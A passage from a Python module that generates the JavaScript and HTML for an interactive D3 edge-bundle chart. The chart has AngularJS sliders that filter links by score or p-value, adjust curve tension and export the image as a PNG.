, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'tension': 0.85};
}
// Left-trim helper used by countDecimals(); overrides the native
// String.prototype.trimLeft. With an explicit `charlist` it strips any
// leading run of those characters; with no argument it strips leading
// whitespace (matching the native behaviour it replaces).
// BUG FIX: the original default charlist was a backslash-s escape inside
// a string literal, which JavaScript collapses to the plain letter "s" -
// so no-argument calls trimmed leading "s" characters instead of
// whitespace. A regex literal sidesteps that string-escaping layer.
String.prototype.trimLeft = function(charlist) {
if (charlist === undefined)
return this.replace(/^\s+/, "");
return this.replace(new RegExp("^[" + charlist + "]+"), "");
};
// Heuristic precision estimate used to configure the p-value slider.
// Returns 0 for whole numbers. For exponent notation (e.g. 1e-7) it
// returns the digits after "e-" - NOTE(review): as a STRING, not a
// number; callers wrap the result in Number(...), which masks this.
// Otherwise it returns the count of leading zeros in the fractional part
// plus one (the position of the first significant decimal digit) -
// NOTE(review): that is not the total number of decimal places
// (e.g. 0.25 yields 1); confirm this is the intended slider precision
// before changing.
Number.prototype.countDecimals = function () {
if(Math.floor(this.valueOf()) === this.valueOf()) return 0;
var value = 0;
var check = this.toString().includes("e-");
if (check) {
var value = this.toString().split("-")[1];
} else {
var value1 = this.toString().split(".")[1];
var value2 = value1.trimLeft("0");
var value = value1.length - value2.length + 1;
}
return value
}
// Angular controller for the dashboard controls: mutually exclusive
// visibility flags for the score/p-value slider panels, one range slider
// per statistic, a curve-tension slider, and a PNG export button.
// (Doubled dollar signs in this source collapse to single ones when the
// enclosing Python template is rendered, yielding the usual Angular names.)
app.controller('MainCtrl', function ($$scope, $$timeout) {
// Exactly one slider panel is shown at a time; absolute score is the default.
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = true;
$$scope.pvalue_visible = false;
// Show the positive-score panel, hide the rest, and force a slider re-render.
$$scope.pos_toggle = function () {
if (!$$scope.pos_visible){
$$scope.pos_visible = !$$scope.pos_visible;
$$scope.abs_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
// Show the negative-score panel, hide the rest.
$$scope.neg_toggle = function () {
if (!$$scope.neg_visible){
$$scope.neg_visible = !$$scope.neg_visible;
$$scope.pos_visible = false;
$$scope.abs_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
// Show the absolute-score panel, hide the rest.
$$scope.abs_toggle = function () {
if (!$$scope.abs_visible){
$$scope.abs_visible = !$$scope.abs_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
// Show the p-value panel when p-values are available; otherwise force
// the score panels back on.
$$scope.pvalue_toggle = function () {
if ("$pmFlag" == "true") {
if (!$$scope.pvalue_visible){
$$scope.pvalue_visible = !$$scope.pvalue_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = false;
}
} else {
$$scope.pvalue_visible = false;
$$scope.pos_visible = true;
$$scope.neg_visible = true;
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
// Flip the p-value panel and reveal the panel matching the checked score radio.
$$scope.score_toggle = function () {
$$scope.pvalue_visible = !$$scope.pvalue_visible;
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
$$scope.pos_visible = true;
} else if (form_val == "NegScoreRadio") {
$$scope.neg_visible = true;
} else if (form_val == "AbsScoreRadio") {
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
// All score sliders round their bounds and step to this many decimals.
var sliderScoreDecimalPlaces = 6;
// Absolute-score window. onChange: flush every link with an impossible
// threshold, then re-filter with the chosen window and re-apply tension.
$$scope.abs_slider = {
minValue: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var absScoreMinValue = $$scope.abs_slider.minValue
var absScoreMaxValue = $$scope.abs_slider.maxValue
var tension = currValues.tension;
currValues['min_abs_score'] = absScoreMinValue;
currValues['max_abs_score'] = absScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(absScoreMinValue, absScoreMaxValue, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
// Positive-score window (only built when positive scores exist).
if (p_scores.length != 0) {
$$scope.pos_slider = {
minValue: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pScoreMinValue = $$scope.pos_slider.minValue
var pScoreMaxValue = $$scope.pos_slider.maxValue
var tension = currValues.tension;
currValues['min_p_score'] = pScoreMinValue;
currValues['max_p_score'] = pScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pScoreMinValue, pScoreMaxValue, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
// Negative-score window (only built when negative scores exist).
if (n_scores.length != 0) {
$$scope.neg_slider = {
minValue: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var nScoreMinValue = $$scope.neg_slider.minValue
var nScoreMaxValue = $$scope.neg_slider.maxValue
var tension = currValues.tension;
currValues['min_n_score'] = nScoreMinValue;
currValues['max_n_score'] = nScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(nScoreMinValue, nScoreMaxValue, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
// P-value window on a log scale; bounds, step and precision are derived
// from the smallest p-value via countDecimals().
if ("$pmFlag" == "true") {
if (pvalues.length != 0) {
$$scope.pvalue_slider = {
minValue: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
maxValue: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
options: {
showSelectionBar: true,
floor: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
ceil: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
step: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues)).countDecimals())),
logScale: true,
precision: Number(d3.min(pvalues).countDecimals()),
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pvalueMinValue = $$scope.pvalue_slider.minValue;
var pvalueMaxValue = $$scope.pvalue_slider.maxValue;
var tension = currValues.tension;
currValues['min_pvalue'] = pvalueMinValue;
currValues['max_pvalue'] = pvalueMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
}
}
// Bundle-tension slider: re-filters with whichever thresholds are active
// (score or p-value radio) and redraws the curves at the new tension.
$$scope.tension_slider = {
value: Number(0.85),
options: {
showSelectionBar: true,
floor: Number(0.0),
ceil: Number(1.0),
step: 0.05,
precision: 4,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var tension = $$scope.tension_slider.value
currValues['tension'] = tension;
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked) {
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
var score_form = document.getElementById("scoreSelect")
var score_form_val;
for(var i=0; i<score_form.length; i++){
if(score_form[i].checked){
score_form_val = score_form[i].id;
}
}
if (score_form_val == "PosScoreRadio") {
var min_p_scoreValue = currValues.min_p_score;
var max_p_scoreValue = currValues.max_p_score;
var FlareData = filterData(min_p_scoreValue, max_p_scoreValue, 'score_pos');
} else if (score_form_val == "NegScoreRadio") {
var min_n_scoreValue = currValues.min_n_score;
var max_n_scoreValue = currValues.max_n_score;
var FlareData = filterData(min_n_scoreValue, max_n_scoreValue, 'score_neg');
} else if (score_form_val == "AbsScoreRadio") {
var min_abs_scoreValue = currValues.min_abs_score;
var max_abs_scoreValue = currValues.max_abs_score;
var FlareData = filterData(min_abs_scoreValue, max_abs_scoreValue, 'score_abs');
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
var pvalueMinValue = currValues.min_pvalue;
var pvalueMaxValue = currValues.max_pvalue;
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
}
}
}
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
// Export the current SVG as a PNG slightly larger than the bundle.
// `diameter` is captured from the enclosing redraw() scope.
$$scope.savebutton = function () {
var options = {
canvg: window.canvg,
backgroundColor: '$backgroundColor',
height: diameter+100,
width: diameter+100,
left: -50,
top: -50,
scale: 5/window.devicePixelRatio,
encoderOptions: 1,
ignoreMouse : true,
ignoreAnimation : true,
}
saveSvgAsPng(d3.select('svg#edgeBundle').node(), "edgeBundle.png", options);
}
});
function changeFilter() {
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++){
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
d3.select('#scoreSelect').style("display", 'block');
var form_score = document.getElementById("scoreSelect")
var form_val_score;
for(var i=0; i<form_score.length; i++){
if(form_score[i].checked){
form_val_score = form_score[i].id;
}
}
if (form_val_score == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
d3.select('#scoreSelect').style("display", 'none');
//Filter out all links prior to updating with the pvalue threshold
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_pvalue, currValues.max_pvalue, 'pvalue');
var linkLine = updateBundle(FlareData);
}
} else {
d3.select('#scoreSelect').style("display", 'block');
}
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
// Re-filter the bundle after the user picks a different score radio
// (positive / negative / absolute). For the selected mode the links are
// first flushed with an impossible threshold and then re-filtered with
// the thresholds stored in currValues, before re-applying the current
// curve tension.
function changeScore() {
var radios = document.getElementById("scoreSelect")
var selected;
for (var idx = 0; idx < radios.length; idx++) {
if (radios[idx].checked) {
selected = radios[idx].id;
}
}
// Per-radio settings: an out-of-range "flush" threshold plus the stored
// [lo, hi] window and the matching filter type.
var modes = {
PosScoreRadio: {flush: Number(d3.max(p_scores))*10, lo: currValues.min_p_score, hi: currValues.max_p_score, type: 'score_pos'},
NegScoreRadio: {flush: Number(d3.min(n_scores))*10, lo: currValues.min_n_score, hi: currValues.max_n_score, type: 'score_neg'},
AbsScoreRadio: {flush: Number(d3.max(abs_scores))*10, lo: currValues.min_abs_score, hi: currValues.max_abs_score, type: 'score_abs'}
};
var linkLine;
var mode = modes[selected];
if (mode) {
// Clear every link first, then rebuild with the remembered thresholds.
linkLine = updateBundle(filterData(mode.flush, mode.flush, mode.type));
linkLine = updateBundle(filterData(mode.lo, mode.hi, mode.type));
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
// The filter-type radio group is only wired up when the template's
// pmFlag renders as "true" (p-values available).
if ("$pmFlag" == "true") {
var filterDim = d3.select("#filterType");
filterDim.on("change", changeFilter);
}
// The score-type selector is always active.
var selectDim = d3.select("#scoreSelect");
selectDim.on("change", changeScore);
// Dashboard variant of updateBundle: rebuilds the hierarchical edge
// bundle from `data`, refills the shared statistic arrays, and wires
// node/link hover handlers that also dump the hovered item's details
// into the node-data panel. Returns {line, link} for re-tensioning.
function updateBundle(data) {
// Reset the shared statistic accumulators before re-reading the links.
pvalues = []
p_scores = []
n_scores = []
abs_scores = []
var line = d3.radialLine()
.curve(d3.curveBundle.beta(0.85))
.radius(function(d) { return d.y; })
.angle(function(d) { return d.x / 180 * Math.PI; });
var root = d3.hierarchy(packageHierarchy(data), (d) => d.children);
cluster(root)
var nodes = root.descendants();
node = node.data(nodes.filter(function(n) { return !n.children; }));
node.exit().remove();
// Scale the configured font size relative to the canvas width.
function getFont() {
var fontBase = 1000;
var fontSize = $fontSize;
var ratio = fontSize / fontBase;
var width = canvas.clientWidth;
var size = width * ratio;
return (size|0) + 'px';
}
// Scale the configured arc radius offset relative to the canvas width.
function getArcRadiusOffset() {
var arcBase = 1157;
var arcRatio = $arcRadiusOffset / arcBase;
var arcWidth = canvas.clientWidth;
var arcRadOffset = arcWidth * arcRatio;
return (arcRadOffset|0);
}
//Test to see if there are multiple blocks in the data. If none then set addArcs to false
var blocks = []
nodes.forEach(function(n) { if (n.data.Block !== undefined) { blocks.push(n.data.Block) }});
if ("$addArcs" == "true") {
var addArcs = true;
if (blocks.length == 0) {
addArcs = false;
}
} else {
var addArcs = false;
}
if (addArcs == true) {
// Group the leaf nodes by Block and draw one labelled arc per block.
var groupDict = {}
var adjArcRadiusOffset = getArcRadiusOffset();
var arcTextPositionOffset = 0.75 * adjArcRadiusOffset;
var arcRadius = innerRadius + adjArcRadiusOffset;
var arcGap = adjArcRadiusOffset + 5;
nodes.forEach(function(n) {
if (n.data.Block !== undefined) {
if (groupDict[n.data.Block] === undefined) {
groupDict[n.data.Block] = []
groupDict[n.data.Block].push(n)
} else {
groupDict[n.data.Block].push(n)
}
}
})
// One representative node per block; its parent supplies the angle span.
var groups = []
for (var [key, value] of Object.entries(groupDict)) {
groups.push(value[0])
}
edgeBundle.selectAll("g.group").remove();
// NOTE(review): append("group") creates a non-standard <group> element
// (probably meant "g"); the elements are only used below as carriers of
// bound data, so rendering is unaffected - confirm before changing.
var groupData = edgeBundle.selectAll("g.group")
.data(groups)
.enter().append("group")
.attr("class", "group");
var groupArc = d3.arc()
.innerRadius(innerRadius)
.outerRadius(arcRadius)
.startAngle(function(d) { return (findStartAngle(d.__data__.parent.children)-$extendArcAngle) * Math.PI / 180;})
.endAngle(function(d) { return (findEndAngle(d.__data__.parent.children)+$extendArcAngle) * Math.PI / 180});
edgeBundle.selectAll("g.arc").remove();
edgeBundle.selectAll("g.arc")
.data(groupData._groups[0])
.enter()
.append("svg:path")
.attr("d", groupArc)
.attr("class", "groupArc")
.attr("fill", function(d) { return d.__data__.data.block_color; })
.style("fill-opacity", 1.0)
.attr("id", function(d,i) { return "arc_"+i; });
edgeBundle.selectAll(".arcText").remove();
edgeBundle.selectAll(".arcText")
.data(groupData._groups[0])
.enter()
.append("text")
.attr("class", "arcText")
.attr("x", 5) //Move text from the start angle of the arc
.attr("dy", arcTextPositionOffset) //Move the text down
.append("textPath")
.attr("xlink:href",function(d,i){return "#arc_"+i;})
.style("font-size", getFont())
.text(function(d){return d.__data__.data.Block;});
} else {
var arcGap = 5;
}
// Draw the leaf labels; highlighting is wired to hover or to
// click/double-click depending on the mouseOver template flag.
if ("$mouseOver" == "true") {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("mouseover", mouseovered_node)
.on("mouseout", mouseouted);
} else {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("click", mouseovered_node)
.on("dblclick", mouseouted);
}
node = node.merge(newNode);
// Decorate each link with its colour/score (plus p-value when available)
// and refill the shared statistic arrays.
var links = packageImports(root.descendants());
if ("$pmFlag" == "true") {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]
, link_pvalue : d.source.data.imports[d.target.data.id]["link_pvalue"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score))
, pvalues.push(d.link_pvalue);
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
} else {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score));
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
}
link = link.data(links);
link.exit().remove();
var newLink = link.enter().append("path")
.attr("class", "link")
.attr('d', d => line(d.source.path(d.target)))
.style("stroke", function(d) { return d.link_color; })
.on("mouseover", mouseovered_link)
.on("mouseout", mouseouted);
link = link.merge(newLink);
var linkLine = {"line": line, "link": link}
// Smallest x (angle in degrees) among the given siblings.
function findStartAngle(children) {
var min = children[0].x;
children.forEach(function(d) {
if (d.x < min) {
min = d.x;
}
});
return min;
}
// Largest x (angle in degrees) among the given siblings.
function findEndAngle(children) {
var max = children[0].x;
children.forEach(function(d) {
if (d.x > max) {
max = d.x;
}
});
return max;
}
// Show the hovered node's attributes (column names injected by the
// template) as quoted CSV lines in the node-data panel, then highlight
// the node and its incident links. Numeric values are shown in
// exponential notation. displayNodeData is presumably defined elsewhere
// in this file (not visible here).
function mouseovered_node(d) {
peak_data = $node_data.data
if (Number.isNaN(Number(d.data[peak_data[0]]))) {
var init_value = d.data[peak_data[0]]
} else if (typeof Number(d.data[peak_data[0]]) == 'number') {
var init_value = Number(d.data[peak_data[0]]).toExponential();
}
html_line = "\\""+ peak_data[0] + "\\",\\"" + init_value + "\\"";
peak_data.forEach(function(p) {
if (p !== peak_data[0]) {
if (Number.isNaN(Number(d.data[p]))) {
var data_value = d.data[p];
} else if (typeof Number(d.data[p]) == 'number') {
var data_value = Number(d.data[p]).toExponential();
}
html_line = html_line + "\\n\\"" + p + "\\",\\"" + data_value + "\\"";
}
});
displayNodeData(html_line)
node
.each(function(n) { n.target = n.source = false; });
link
.classed("link--target", function(l) { if (l.target === d) return l.source.source = true; })
.classed("link--source", function(l) { if (l.source === d) return l.target.target = true; })
.filter(function(l) { return l.target === d || l.source === d; })
.each(function() { this.parentNode.appendChild(this); });
node
.classed("node--both", function(n) { return n.source && n.target; })
.classed("node--target", function(n) { return n.target; })
.classed("node--source", function(n) { return n.source; });
link.style('opacity', o => (o.source === d || o.target === d ? 1 : $linkFadeOpacity));
}
// Show the hovered link's source/target/p-value/score in the node-data
// panel and highlight its endpoints.
// NOTE(review): d.link_pvalue is read unconditionally, but links only
// carry a p-value when the template's pmFlag renders "true" - confirm
// this handler is unreachable otherwise.
function mouseovered_link(d) {
node
.each(function(n) { n.target = true; n.source = true; });
link
.classed("link--source", function(l) { if (l.source.data.id === d.source.data.id) return l.target.target = true; });
node
.classed("node--target", function(n) { if (n.data.id == d.target.data.id) return n.target; })
.classed("node--source", function(n) { if (n.data.id == d.source.data.id) return n.source; });
link.style('opacity', o => (o.source === d.source || o.target === d.source ? 1 : $linkFadeOpacity))
var source = d.source.data.Label;
var target = d.target.data.Label;
html_line = "\\"Source\\",\\""+ source + "\\"\\n\\"Target\\",\\"" + target + "\\"\\n\\"Pvalue\\"," + d.link_pvalue.toPrecision(3) + "\\n\\"Score\\"," + d.link_score.toPrecision(3)
displayNodeData(html_line)
}
// Clear the node-data panel and all hover highlighting.
function mouseouted(d) {
d3.select('#nodedataPanel').selectAll("*").remove();
link
.classed("link--target", false)
.classed("link--source", false);
node
.classed("node--both", false)
.classed("node--target", false)
.classed("node--source", false);
link.style('opacity', 1);
node.style('opacity', 1);
}
// Build the node hierarchy from "#"-delimited ids; returns the root
// (the entry whose id is the empty string).
function packageHierarchy(classes) {
var map = {};
function find(id, data) {
var node = map[id], i;
if (!node) {
node = map[id] = data || {id: id, children: []};
if (id.length) {
node.parent = find(id.substring(0, i = id.lastIndexOf("#")));
node.parent.children.push(node);
node.key = id.substring(i + 1);
}
}
return node;
}
classes.forEach(function(d) {
find(d.id, d);
});
return map[""];
}
// Convert every entry of each node's `imports` map into a
// {source, target} pair of hierarchy nodes.
function packageImports(nodes) {
var map = {}, imports = [];
nodes.forEach(function(d) {
map[d.data.id] = d;
});
nodes.forEach(function(d) {
if (d.data.imports) Object.keys(d.data.imports).forEach(function(i) {
imports.push({source: map[d.data.id], target: map[i]});
});
});
return imports;
}
return linkLine;
}
function filterData(minThreshold, maxThreshold, filtType) {
const data = flareData.map(a => ({...a}));
var FlareData = []
//Remove nodes from imports with weight below threshold
for (var i = 0; i < data.length; i++) {
var flare = data[i];
var links = flare.imports;
var newLinks = {}
for (const [key, value] of Object.entries(links)) {
var link_score = value["link_score"];
var link_color = value["link_color"];
if ("$pmFlag" == "true") {
var link_pvalue = value["link_pvalue"];
}
if (filtType == 'score_abs') {
if ((Math.abs(link_score) >= minThreshold) && (Math.abs(link_score) <= maxThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else if (filtType == 'score_neg') {
if ((link_score <= maxThreshold) && (link_score >= minThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else if (filtType == 'score_pos') {
if ((link_score >= minThreshold) && (link_score <= maxThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else {
if ("$pmFlag" == "true") {
if (filtType == 'pvalue') {
if ((link_pvalue >= minThreshold) && (link_pvalue <= maxThreshold)) {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
}
}
}
}
}
flare.imports = newLinks;
FlareData.push(flare)
}
return FlareData;
}
function displayNodeData(datasetText) {
d3.select('#nodedataPanel').selectAll("*").remove();
var rows = d3.csvParseRows(datasetText),
table = d3.select('#nodedataPanel').append('table')
.style("border-collapse", "collapse")
.style("border", "2px black solid");
var tablebody = table.append("tbody");
rows = tablebody
.selectAll("tr")
.data(rows)
.enter()
.append("tr");
cells = rows.selectAll("td")
.data(function(d) { return d; })
.enter()
.append("td")
.text(function(d) { return d; })
.style("border", "1px black solid")
.style("font-size", "15px");
};
}
redraw();
// Redraw based on the new size whenever the browser window is resized.
window.addEventListener("resize", redraw);
'''
return js_text
def __getHTML(self):
html_text = '''
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.css">
</head>
<style> $css_text </style>
<body ng-app="rzSliderDemo">
<div class="row" ng-controller="MainCtrl">
<div class="col-4">
<div class="row col-2-auto">
<form id="filterType">
<input type='radio' id="scoreRadio" value="Score" name="mode" ng-click="score_toggle()" checked/> Score
<input type='radio' id="pvalueRadio" value="Pvalue" name="mode" ng-click="pvalue_toggle()"/> Pvalue
</form>
</div>
<div class="row col-3-auto">
<form id="scoreSelect">
<input type="radio" id="PosScoreRadio" name="mode" value="Positve" ng-click="pos_toggle()"/> Positive
<input type="radio" id="NegScoreRadio" name="mode" value="Negative" ng-click="neg_toggle()"/> Negative
<input type="radio" id="AbsScoreRadio" name="mode" value="Absolute" ng-click="abs_toggle()" checked/> Absolute
</form>
</div>
<div ng-show="abs_visible" class="row">
<rzslider id="abs_slider" class="abs_slider" rz-slider-model="abs_slider.minValue" rz-slider-high="abs_slider.maxValue" rz-slider-options="abs_slider.options"></rzslider>
</div>
<div ng-show="pos_visible" class="row">
<rzslider id="pos_slider" class="pos_slider" rz-slider-model="pos_slider.minValue" rz-slider-high="pos_slider.maxValue" rz-slider-options="pos_slider.options"></rzslider>
</div>
<div ng-show="neg_visible" class="row">
<rzslider id="neg_slider" class="neg_slider" rz-slider-model="neg_slider.minValue" rz-slider-high="neg_slider.maxValue" rz-slider-options="neg_slider.options"></rzslider>
</div>
<div ng-show="pvalue_visible" class="row">
<rzslider id="pvalue_slider" class="pvalue_slider" rz-slider-model="pvalue_slider.minValue" rz-slider-high="pvalue_slider.maxValue" rz-slider-options="pvalue_slider.options"></rzslider>
</div>
<div class="row">
<rzslider id="tension_slider" class="tension_slider" rz-slider-model="tension_slider.value" rz-slider-options="tension_slider.options"></rzslider>
</div>
<div id="save" class="row">
<button data-ng-click="savebutton()">Save</button>
</div>
</div>
</div>
<div id="edgeBundlePanel"></div>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js"></script>
